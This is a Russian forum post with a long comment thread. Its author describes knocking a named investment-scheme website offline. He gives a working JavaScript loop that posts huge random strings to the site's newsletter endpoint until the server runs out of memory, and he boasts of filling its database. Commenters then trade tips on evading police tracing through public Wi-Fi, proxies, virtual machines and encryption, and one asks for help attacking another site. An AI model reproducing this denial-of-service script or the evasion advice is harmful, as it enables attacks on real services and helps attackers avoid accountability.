7244

Шлём `Привет` кэшбери

Вижу пост

Не долго парясь нахожу в интернете их сайт http://gdc.group

Ооокей... Смотрим что там и как. И оказывается что фильтр почты, которую к ним на рассылку можно закинуть - фиктивный. Те если отправить руками то можно записать что угодно.

http://gdc.group/files/action/ajax.php?email=1

Методом перебора узнаём что под поле почты выделено 32милиионов(2^25) символов строка... А это 32 мегабайта.

Пишем небольшой скрипт

i=0; spam = () => { $.post('http://gdc.group/files/action/ajax.php', { email: Array(2**25).fill().map(()=>{ return String.fromCodePoint(~~(Math.random(1, 255) * 255)) }).join('') }, (a)=>{console.log(++i, a); spam();}); }; spam();

Хотя на деле лучше степень 20 гдето, потому как на лимите там памяти не хватает.

Ну и итого всё..) Память у сервиса кончилась, удачи разрабам разгребать говно и фиксить дыры..)

Как минимум гигов на 10 в базу я поднасрать успел, пока память не закончилась... Если ребутнут не пофиксив, продолжим...

Такие успешные парни, а найти разраба не из студентов не смогли =\

Теперь всегда так:

Fatal error: Allowed memory size of 268435456 bytes exhausted (tried to allocate 4304128 bytes) in /home/bitrix/ext_www/gdc.group/files/action/ajax.php on line 8

Ещё и битрикс... Фи...

Вы смотрите срез комментариев. Показать все
0
Автор поста оценил этот комментарий

Ок, ты совершенно прав :). что не отменяет того, что без IP в логе следаку вообще искать нечего. Нужно логи за собой затирать, в общем :)

раскрыть ветку (6)
0

Ну какбы берёшь делаешь себе проксю через общественный макдак, переправляя траффик через телефон. Профит.

Ещё вариант - делать через трафик общественной сети в метро. Вообще - не отследить как по мне. У тебя ноут в рюкзаке, ты просто едешь. Ничего не делаешь. Скрипты делают всё на автомате..)

раскрыть ветку (5)
1

Если про питерский бесплатный инет в вагонах - то как минимум номер вагона, где точка доступа будет, плюс камеры и в вагонах и везде в метро, их там просто до хрена. И потом, если у тебя хорошие прокси - то нахрена вообще прятаться? запускай все из дома. Попадаются как раз те, кто забывает дома прокси включить.

раскрыть ветку (4)
0

По проксям также всё вычисляется при особом желании =\

Ну а по камерам - что будут пытать всех кто был в вагоне? оО

раскрыть ветку (3)
0

что именно можно вычислить, если юзаешь хороший bulletproof proxy/vpn? Другое дело, что роскомнадзор на него не пустит, но это уже не о том. По любому, нынче достаточно дешево можно построить очень крепкую цепочку, раскиданную по миру так, что любой товарищ майор затрахается ее звенья искать. И ловить будут собственно на других контактах с реальным миром, а не по айпи.

раскрыть ветку (2)
0

Суть же была не в том, а что знает конечный сервер. Тут просто неточность.

0

ой

Иллюстрация к комментарию
раскрыть ветку (5)
0

Вы же понимаете что это плагин? Который работает через сторонний сервис?

Вас никто не обязывает использовать данный плагин.

Поставьте VPN и о госпади - этот ip изменится.

раскрыть ветку (4)
0

Я в курсе, но в данном случае это встроенный в макстон функционал, а не плагин

раскрыть ветку (3)
0

Пфф... Сударь да поймите же. Это ip не тот который браузер знает. А тот который ему сказал сторонний сервис. Это не способность браузера, а способность стороннего сервиса. Опять же - покажите команду для данного браузера в js дабы вывести в консоль этот ip? Если уж вы говорите что можете его отправить.

раскрыть ветку (2)
0

Мы что то в другую степь поехали. Я в курсе, что получение внешнего IP это не функция браузера. Я лишь заметил, что некоторые браузеры позволяют его выводить без использования стороннего софта или команд.

раскрыть ветку (1)
0

вы когда нибудь лог любого http сервера видели? там есть поле client IP

раскрыть ветку (2)
1

Твою ж родину. Это передаёт не браузер. Это лог соединения. Откуда пришло.

Если использовать прокси - будет другой ip

Например у меня сейчас 3 ip 192.168.0.102 127.0.0.1 и ещё один.

У некоторых провайдеров вообще 1 ip на всех.

И мой комп не знает моего ip я его узнать могу как раз с помощью какого либо сервиса на который бы я обратился чтоб он узнал моё имя.

Точнее узнать адрес свой только в локальной сети можно, но он то никому не интересен.

раскрыть ветку (1)
0

:). Ну вот я товарищ майор (ну ок, лейтенант, старшой, правда погон уже лет дцать не ношу, но было время, работал в ИТ), хочу узнать кто сайт кэшберри подломал. Смотрим IP на серваке кэшбери, потом идем к провайдеру где этот ip числится, смотрим его логи, что там сорм -коробки написали и прочее, что найдем.  На этом все и закончится собственно, если ты не из дома ломал или там через хитрый прокси.

0

А webrtc?

Твой пк генерит уникальный хеш, по нему с вероятностью 95% можно определить что это тот же комп. А сам комп вряд-ли будешь тщательно чистить после выхода в сеть. Так что найти комп дело техники. Например, авторизируешься где то в ВК и генеришь тот же хеш
раскрыть ветку (4)
1
Вот только какой нормальный хакер будет пользоваться ВК на виртуалке, которую он использует для нелегальных дел? При этом зашифровать раздел с виртуалкой ещё можно и тогда даже изъяв ноут никто и никогда не узнает что там (если не дашь им ключ). Хороших хакеров по другим следам находят, а не по железу.
0

Расскажи, какая именно часть пк генерит "уникальный хеш", какие вызовы браузера ее используют, как они передаются из клиентского браузера на сервер вк. И что мне помешает поставить гипервизор на комп и юзать на для выхода в сеть исключительно одну из сотни  рандомно созданных виртуалок, с рандомными дивайсами, настройками вм и прочим.

раскрыть ветку (2)
5

Не выключить, а дома оставить. А то у товарища майора вопросы могут быть)

раскрыть ветку (2)
0

А почему оставил? Где был целый день? Обычно ты на работе в это время, а в тот день камеры кафе, что рядом с твоей работой тебя не показали... Подозрительно

раскрыть ветку (1)
0

Забыл.

0

Не просто выключить, а завернуть телефон в фольгу

0

Зачем новый ноут?))

раскрыть ветку (1)
0
А мобилу новую зачем?
0

При этом надо пробовать на месте не более получаса

0

Kali Linux на LiveUSB и не надо танцев с бубном.

0
не ну на создание видимости работы можно и дурачков набрать типа деток министров или даже самому нос всунуть, а если надо - поверь, они замарочатся
0
Нет. Потому, что лень...........
ещё комментарии
ещё комментарии
36

Что, по вашему должен сделать хакер, что бы наказать тех кого вы указываете?

Хахалева сидит с недействительным дипломом. Любой сторонний человек быстро это проверяет. Но у комиссии "нет вопросов к уважаемой судье".

Дела с очкариком и тренером в открытом доступе. Судьи, прокуроры обвинения не скрыты. Любой может узнать кто там был. В соответствующих новостях есть имена. Этим людям что нибудь сделали с официальной стороны? Ну там хоть проверили материалы дела? "У нас есть доказательство которое никто не видел и никому не покажем, но одних слов, что оно есть достаточно для обвинительного приговора".

Ну и что может сделать "белый" хакер? Найти инфу что у Хахалевой и диплом ветеринара поддельный? Так "Всем насрать".

Взломать счета в банке? Ну бедным господам всё компенсируют и в итоге недостача ляжет на низших работников банка.

Все ваши примеры объединяет одно - "Полная безнаказанность". Людей выше тех которых вы указали полностью устраивает работа тех кого вы указали. И пока так будет этичного метода борьбы не существует.

раскрыть ветку (10)
17
На самом деле с хахалевой ситуация такая, что похоже ее покрывает кто то из высшего руководства, ибо только глухой в этой стране о ней не слышал, а властям похер (обычную судью бы давно уволили задним числом, а может и посадили бы). Насчёт очкарика история мутная, я сам понять не могу кто прав, а кто нет, мы то слышим мнение лишь одной стороны, но если очкарик прав и пойдет с апелляцией в вышестоящие суды - то есть ненулевая вероятность, что у его оппонентов на определенном этапе закончатся связи/деньги. Про тренера - да у нас в принципе законы про изнасилования и домогательства так построены, что ничего доказывать не нужно, куча примеров уже было, законы менять надо, но нашим депутатам не до этого, видимо, надо же НДС поднимать
раскрыть ветку (3)
10

Лет 10 назад педалировалась тема что насильники и педофилы остаются безнаказанными, так как доказательную базу собрать очень сложно. Пострадавшим нужно самим собирать доказательства, проводить экспертизы, пинать следователя и т.д.

Сейчас, видимо, маятник качнулся в другую сторону. Чтобы посадить человека достаточно слов “пострадавших”.

раскрыть ветку (1)
0

Ну тут вообще действительно не такая прям простая тема по поводу доказательств изнасилований, обычно ведь это происходит наедине и вряд ли жертва к этому заранее готовится, так что пруфы тут собрать действительно непросто, но нужно искать какой-то баланс, ибо сейчас закон очень сильно перекошен в сторону жертвы

2

Чьим приказом назначена, тот и прикрывает

0
Любой сторонний человек быстро это проверяет
А как?
раскрыть ветку (1)
0

Вы про диплом? Ну к примеру, соответствующее ведомство, всем запрашивающим выдаёт справку что диплом с таким номером никогда не выдавался в Российской Федерации. Никаким ВУЗом. Никому. Ни по какой специальности.

Одно это делает "диплом" раскрашенной бесполезной бумажкой. Все последующие пляски с поиском ВУЗа которое скажет "да она у нас училась" уже для дополнительного нагнетания и рейтингов.

0

написали смешно,  а ситуация страшная.

раскрыть ветку (2)
0

Странно, я как раз и пытался напугать, а не рассмешить...

раскрыть ветку (1)
1

Ну вообще это жестко, и как бы жиза, и как-бы, вообще в голове не укладывается. что действительно такое дерьмо происходит, а люди все глаза закрыли. втч и я. потому что уже "подкоркой" заложено: а че мы сделаем. А это еще у нас такие мысли возникают, что мол хуита происходит не здоровая вокруг, и всем пох. А что будет с поколением 2000. Которые кроме, этой власти ничего не видели. и которые с детства за этим наблюдают. Даже страшно иной раз радикальные комментарии оставлять, так как можно "сесть на карандаш" и в прямом и переносном смысле.

Да я от куда знаю воровать у них со счетов )))
18
Вам выборов в Америке не хватило?!
раскрыть ветку (6)
26

Хыхы) Не поверишь, работал в конторе, которая на них влияла..)

раскрыть ветку (5)
24

Завтра скрин  с вашим комментом будет неоспоримым доказательством где нибудь в оон=)

раскрыть ветку (1)
19

в ооооооон там)

3

постил в тивттере ?

1
В штабе Клинтон, что ли?
0

Подробнее?)

10
В общем, в хакерском мире есть негласное правило: "Нельзя идти против своей страны". Иначе их быстро закрывают власти. Такие дела. Если нужны пруфы, то могу поискать. Где-то на Хабре перевод статьи был недавно
раскрыть ветку (6)
3

Это такой воспитательный вброс для молодых энтузиастов. Подобные статьи появляются регулярно. Тем, кто такие материалы воспринимает всерьез, категорически не следует идти в теневую сферу, ибо легковерные долбоебы и готовое мясо для первого же хищника.

1

Да вроде это в журнале хакер в лохматом 2000 году постулировали. Даже если прикрыл жопу пятью впн и сидишь с калькулятора с ядром своей сборки.

0

Если не обломаешься, найди плиз)

раскрыть ветку (1)
2
0
DELETED

как пример, отечественные кардеры не работают с картами снг и россии...

Что!? Что блять !? Они против своей страны идут если не сворачивают кровь таким пидорасам!
4

Ну Анонимусы что-то подобное делали, только не с российскими персонажами.

1
Потому что толку нет. Ну вот достанут они инфу что хахалева действительно не получала юр.образования и что дальше? Это итак все знают, это подтверждено самим учебным учреждением. Что дальше?
раскрыть ветку (5)
0
DELETED
Вообще то нет, не все знают. Не выкладывают полную информацию по проверке её дипломов. Нам только одну сторону медали показывают
раскрыть ветку (3)
3

Что-то мне подсказывает, что если бы были документы подтверждающие её обучение, то они давно были бы в сети, ибо они очень легко и просто бы остановили всю волну хайпа. А так - какая "полная информация по проверке диплома" вам нужна? Если её никто не станет проводить. Нет проверки - нет информации - нет оснований не доверять словам судьи?

раскрыть ветку (2)
DELETED
Судейская коллегия проводила проверку. Не выявили нарушений. О процессе проверки имеют законное право не раскрывать. Таков закон
раскрыть ветку (1)
1
Ну так а я о чём говорю? Напрашивается вывод что коллегия пиздит. В чём сложность выложить пару документов, которые доказали бы невиновность? Конечно, проще в баньке посидеть, решить что все путём - народу скажем что нарушений нет, а подробности раскрывать не будем.
0
DELETED
Комментарий удален. Причина: данный аккаунт был удалён

Хэлл когда-то был, да его осудили.

раскрыть ветку (2)
1

Так его деанонимизировали? Почему я не в курсе?

раскрыть ветку (1)
0

Если кратко - впаяли обвинение какому-то мужику, Хэлл лично отрицает, что это он, но в целом, логично, что именно это он бы и делал.

ещё комментарий
47

Не дадут. Лучше не оставлять следов.

раскрыть ветку (23)
53

Ну вопрос масштабности дела. Если бы удалось сделать инъекцию - фиг бы я об этом рассказывал))

раскрыть ветку (22)
27

Польский хакер пытался взломать БД  камер через номер автомобиля)))

раскрыть ветку (13)
1
DELETED
Для ЛЛ объясните
раскрыть ветку (9)
13

Любые данные в типичную БД вносятся командой вроде ADD ‘Вася’ TO TABLE ‘Алкоголики’ IN DATABASE ‘Бухаем’ (синтаксис совсем фиктивный, есличо): в одной строке передаются и команды, и данные. Если пользователь достаточно хитрожопый,  он может попытаться передать с запросом такие данные, которые БД сочтёт частью команды. Хозяин этой машины попытался таким образом передать команду «удалить базу данных», рассчитывая, что в польском ГИБДД IT-отдел состоит из полных идиотов.

раскрыть ветку (7)
6

Нет, это если разработчик достаточно дебил и не делал экранирования.

раскрыть ветку (4)
0

Одно другому не противоречит

0

Так, а разве в субд не стоит по-умолчанию запрет на дроп всей таблицы? Я, как любитель, уточняю

раскрыть ветку (2)
4

Нет конечно. А как ты её удалишь если понадобится?) Просто нормальные люди делают пользователя который должен допустим только добавлять и редактировать с правами на insert+update

0
защита может быть, но вот например исподвыподверта она может ничего не блокировать..
0
DELETED
А это просто мем? Или это реально сработало?
раскрыть ветку (1)
1
Просто чел пробовал. Не сработало.
6

Если ПО писали черти рукожопые, то при распознавании "номера" этого авто может быть убита таблица с номерами оштрафованных камерой до него.

Если автор данной команды не имеет отношения к разработчика этого ПО, то вероятность такого события крайне мала. А эта картинка специфичный прикол для коллег.

1

А вот комикс на эту тему

раскрыть ветку (1)
1
Им бы ещё поучиться не называть таблицы во множественном числе.
0

Как же ему проводить слепые инъекции...

7

снести к херам БД... эпично...

Msg 2520, Level 16, State 5, Line 1

Не удалось найти базу данных "[PROD]". База данных не существует или была удалена перед выполнением обращающейся к ней инструкции. Проверьте, что база данных существует, выполнив запрос к представлению каталога sys.databases.

раскрыть ветку (7)
17
Снести, снести... Лучше скачать. База лохов онлайн и без смс
0

для таких дел есть бэкапы)

раскрыть ветку (3)
2
У таких бэкапы обычно тухлые
раскрыть ветку (2)
3
Зато у дата центра, который сдает им хостинг, наверняка ежедневные
раскрыть ветку (1)

:) :) :). Скажем так, не буду комментировать :)

DELETED
И что снести, у любого админа пара тройка бэкапов в разных местах. Восстанавливается моментом.
раскрыть ветку (1)
4

Не факт. Админы делятся на тех, кто делает бэкапы, и тех, кто ещё нет

9
DELETED

Ты же помнишь, что всякие АУЕшники первыми бегут в полицию жаловаться, если им хвост подпалить. Эти тоже с визгами побегут в прокуратуру жалобы писать, и тут даже доказывать ничего не надо, прокуратура с широкой улыбкой это подхватит, получит свою палку, а ты свой в лучшем случае штраф и судимость.

Я бы на твоем месте поаккуратнее был с этим, я серьезно. Зачем тебе эти проблемы?

1

Чувак, я не кэшбери, но я хочу с тобой дружить. Как тебя найти?

раскрыть ветку (2)
1

По нику есть сайт. Там контакты.

раскрыть ветку (1)
0

палишся? так просто?

0
DELETED

мне кажется, что смысла нет так извращаться))
Ну хотят люди быть лохами, ну и пусть, а мы откинемся на спинку кресла и посмотрим на рвущиеся пуканы

0
DELETED
Комментарий удален. Причина: данный аккаунт был удалён
0

а можно для тупых-что именно ты сделал

0
Скорее сделают предложение,от которого не сможешь отказаться )
0

Так может ещё докучи осложнить им жизнь тем, чтоб на главной написать, уважаемые граждане -  не ведитесь на это дерьмо - не будьте лохами :)

0
И быть в инете анонимным.
0

У них как бы такие же права как и у тебя, как бы это странным не казалось. Так что с чего вдруг? Воровать у престпуников тоже воровство и т.д.

0

Это гениально, я даже не думал что так можно) 

0
DELETED

Все круто, только накатят бэкап дневной давности, и прикрутят капчу. И все.

0
Скрипт то довольно быстро наверняка базу засрал, наверняка можно просто записи за этот период все снести и все, делов на 5 минут, если знаешь как оно работает
0

Красавчик!! Хе хе))

ещё комментарий

Да нифига. Одно преступление не отменяет другое, а ты выложил достаточно личной информации, чтобы на тебя можно было ,без проблем открыть дело. Там даже фотка есть в истории сообщений.

Такое нужно делать с левого аккаунта или "перепостом". Чего стоило написать в конце "информацию нашел на просторах интернета"?

Да ты молодец ТС! Давай дави этих капиталистов)))

Тут есть один сайтик поганый! Уже 2 поста с ним борюсь и там пикабушники активно помогают но ничего сделать не удалось:( только репутацию в поисковике им набили:( Может вы чем то поможете?

Посты:

https://pikabu.ru/story/ostorozhno_moshenniki_texnomir24ru_i...

https://pikabu.ru/story/ostorozhno_moshenniki_texnomir24ru_o...

Сайтик ублюдков:
https://texno-mir24.ru/

51
К нам в веб-студию на роль фулл-стак разработчика взяли чела, который до этого через скрипты положил два крупных портала которые мы обслуживали. Мы с горящими жопами всю неделю это разгребали. Причем сделал он это специально, чтобы показать дыры этих порталов и устроиться к нам.

Кто знает, может ТС в Кэшбери метит? :D
57
Мы ТСа не выдадим!
раскрыть ветку (11)
19

Пока нам не заплатят? :-)

раскрыть ветку (3)
26
DELETED

я, конечно, проклинаю всех этих уродов, но 100 рублей есть 100 рублей...

3

кэшберри

раскрыть ветку (1)
6

Кэшбери???!!!

Нам не нужны их грязные деньги!

(а сколько они готовы заплатить?)

1

Но на всякий случай в топ поднимем ;)

0
Уже нашелся один #comment_127081718
0

Вы может быть и не выдадите, а вот админ на официальный запрос, сольет IP, с которого было написано чистосердечное.

0
Подскажите пожалуйста, как расшифровать ”ТС“”
раскрыть ветку (3)
0

Уже в посте писали: ТопикСтартер

0
ТС - топик стартер, автор поста, однако мне больше нравится Товарищ Сталин
раскрыть ветку (1)
0
Спасибо)
17

Они ж не в России, вроде. При чём тут наши статьи.

12
У человека почта длинная. Имеет право
раскрыть ветку (1)
6

256 символов максимум..)

22

ТС скажет - уснул на клавиатуре, вот эти 32Мб символов и улетели на кешбери...)))

28
Ну всё теперь, ТС, жди гостей
41
спешу расстроить, он просто обратился к базе данных сайта, не попадает под статью)
раскрыть ветку (17)
22

Ну не совсем, если очень захотеть там можно раздуть, но это жесть как захотеть надо.

3

Автор написал вредоносную программу на js, код которой приложил в посте, ее использование привело к нарушению работы сайта, под статью должно попадать. Легкая палка для наших доблестных полиционеров, осторожнее надо быть.

раскрыть ветку (11)
27

Посмотрел по терминам - не попадает под вредоносные программы )

По сути она лишь занималась обращением к их сервису... И опачки я ошибся и отправлялось не то, но мне же фид бека не было что о шибся..)

раскрыть ветку (9)
13
ещё комментарии
0

Тут как бы сам сайт на говнодвижке. Не стоит забывать об этом.

ещё комментарии
6

Эти еще несколько можно пришить разрабам битрикса.  Особенно первую...

5

"наказываются лишением свободы на срок до трех лет со штрафом в размере до двухсот тысяч рублей". Нет... Не пойдет!

5
274 статья вообще непонятная - вместо энтер нажал эскейп - нате 2 года зоны )))
1
Кто притянет то? Артур Варданян? Это придуманное имя. Этот чувак просто актёр нанятый)))
раскрыть ветку (1)
0
Ее
0
DELETED
Так не вредоносные жы! Сплошная польза!
0
По 247 можно сажать все антивирусные компании?
0
Распространение точно нет. А есть ссылочка на правила эксплуатации ЭВМ? А то я уже 27 лет эксплуатирую, а правил не знаю
раскрыть ветку (1)
0

В посте и сам код, и инструкция как им пользоваться есть. Не это ли считается распространением?!

0

если притянут, тут есть лига юристов. я думаю они помогут хорошему человеку.

0
Это Россия,тут возможно все) не удивлюсь,если захотят посадить за такую мелочь)

Тогда может позвать @moderator 'a? Если автора за это можно посадить, то и местных "Робин Гудов" тоже.

Да и вроде в одном из правил написано по поводу нарушения УК.

Да где ж тут вредоносные программы. Обычный dos
раскрыть ветку (2)
2

Во первых ddos и dos - это разные вещи.

Во вторых это не ddos.

раскрыть ветку (1)
0

курить до полного просветления, и учиться отличать denial of service от disturbed denial of service

https://en.wikipedia.org/wiki/Denial-of-service_attack

8

Я понял, что ТС опасный парень!

раскрыть ветку (2)
19

Ага, чувак который всё делает на JS опасен :D

раскрыть ветку (1)
0

Это как стройбат, настолько опасны, что им даже автомат не дают.

7
Засрал им почту своими расслыками. Молоток
27
DELETED
Так вот как расшифровывается ТС
раскрыть ветку (20)
51

Бля, если б вы это не написали, я бы был дальше в неведении))

раскрыть ветку (15)
17

я тоже стеснялсо спросить... вдруг забанят ещё....

раскрыть ветку (14)
25

@moderatorb, тут стесняшка

4
DELETED
Я загуглить хотел ещё раньше, но было лень, думал так и так в комментариях однажды появится, и вот этот день настал !!! =)
раскрыть ветку (12)
7

Тс, сабж, флуд, оффтоп, флейм, ник, тред, приват, пм, модер, бан, холивар, чат, тролль, кэп... Вам, ребят, только недавно интернет завезли, что ли?)

раскрыть ветку (11)
7

Ей богй - ТС знаю значение, но не знал расшифровки )

раскрыть ветку (1)
1

Держи друг - topic starter

3
DELETED
Ну я не совсем динозавр, кроме сокращения ТС все знал, на форумах не сижу, на Пикабу не так давно.
1
А разве приват и ПМ - не одно и то же?
раскрыть ветку (3)
26
Приват это в стриптиз клубе, а пм это пистолет

одно и то же, но я не ставил цели "не повторяться")

Private mesage.
0

Что такое флейм? Впервые вижу

раскрыть ветку (2)
2

бессмысленный спор. переругивание ради переругивания.

0

"поток чрезмерной эмоциональности". типа дохера восклицательных знаков, смайлов, капс и т.д. За него банили на форумах)

0

У нас мало английских сокращений прижилось, разве что в геймерской среде, тот же афк и т.п., у них так все в них, вот пример, когда

My summer holidays were a complete waste of time. Before, we used to go to New York to see my brother, his girlfriend and their 3 kids face to face. I love New York, it’s a great place.

записывают как:

My smmr hols wr CWOT. B4, we used 2go2 NY 2C my bro, his GF & thr 3 :- kids FTF. ILNY, it’s a gr8 plc. ))

11

Topic Starter

раскрыть ветку (3)
0
Или же просто, Автор
раскрыть ветку (2)
3
DELETED
Но топик стартер может не быть автором. Это может быть и репост.
раскрыть ветку (1)
0

Автор репоста!

12

Они сделал вот это, примерно:

Ты обычный алколыга, в меру спивающийся. Подбухнул и лёг на лавочку, а Тс подошёл и тебе на ширинку нассал.

5
1
Никогда не думал, что чёрное дело будет добрым...
раскрыть ветку (2)
2

Я — часть той силы, что вечно хочет зла и вечно совершает благо. (с)

раскрыть ветку (1)
1
"Частичка силы я, желавшей вечно зла, но творившей лишь благое" я вот в таком варианте перевода читал гете.
0
Господи наконец-то я понял кто такие тс
0
Просте есть в народе спемеры покруче)
0
DELETED

https://www.jordans.co.uk/business-information/company-searc...

вот совсем не наебалово :))))

0
Так вот что значит ТС!
0
Я тоже хотел бы узнать что это?
0

Вот почти так-же хотел написать, только обзывательства такого не знаю))

0
Он думает, что положил сайт небольшим скриптом, но на самом деле - строитель пирамиды не учел огромный поток желающих вложить и стать богатыми и сэкономил на ресурсах сервера.
0
Это потому что там битрикс
раскрыть ветку (1)
0
DELETED

нет

Только зачем? Те, кто заносят туда деньги будут против. А те кто не заносит - им по барабану.
раскрыть ветку (2)
12

Потому что это весело!

раскрыть ветку (1)
2

Правильно, настоящий учёный не спрашивает, зачем скрещивать пингвина с чемоданом, он спрашивает, как это сделать.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку